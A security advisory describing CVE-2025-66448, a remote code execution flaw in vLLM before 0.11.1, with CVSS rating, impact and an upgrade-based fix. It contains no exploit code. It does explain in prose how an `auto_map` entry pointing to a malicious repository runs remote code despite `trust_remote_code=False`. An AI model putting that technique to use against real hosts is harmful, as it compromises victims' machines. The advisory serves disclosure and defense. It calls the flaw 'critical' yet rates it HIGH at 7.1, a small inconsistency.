Overview
CVE-2025-66448 identifies a critical remote code execution (RCE) vulnerability in vLLM, an inference and serving engine for large language models (LLMs). This vulnerability affects versions prior to 0.11.1. It allows an attacker to execute arbitrary code on a victim’s machine by exploiting a flaw in how vLLM handles model configurations, specifically when using the `auto_map` feature within the `Nemotron_Nano_VL_Config` class.
Technical Details
The vulnerability stems from the way vLLM loads model configurations that contain an `auto_map` entry. When vLLM encounters this entry, the configuration class attempts to resolve the mapping using the `get_class_from_dynamic_module(…)` function. This function fetches and immediately instantiates the returned class, effectively executing Python code from the remote repository referenced in the `auto_map` string.
A crucial aspect of this vulnerability is that it bypasses the intended security mechanism of `trust_remote_code=False`. Even when this flag is explicitly set to `False` in `vllm.transformers_utils.config.get_config`, the remote code execution still occurs. This allows an attacker to publish a seemingly benign frontend repository whose `config.json` points via `auto_map` to a separate, malicious backend repository. Loading the frontend model configuration will then silently execute the backend’s code on the victim’s host.
CVSS Analysis
- Severity: HIGH
- CVSS Score: 7.1
This vulnerability is rated as HIGH severity due to the potential for remote code execution, allowing an attacker to gain complete control of the affected system.
Possible Impact
Exploitation of CVE-2025-66448 can have severe consequences, including:
- Complete System Compromise: Attackers can gain full control over the affected server or machine.
- Data Exfiltration: Sensitive data can be stolen from the compromised system.
- Malware Installation: The attacker can install malware, including ransomware, on the system.
- Denial of Service (DoS): The attacker can disrupt the availability of the vLLM service.
Mitigation or Patch Steps
The vulnerability is fixed in vLLM version 0.11.1. The primary mitigation step is to upgrade to vLLM version 0.11.1 or later.
If upgrading is not immediately possible, consider implementing network-level restrictions to limit outbound connections from the vLLM server to only trusted repositories. However, note that this is a less effective mitigation than upgrading.
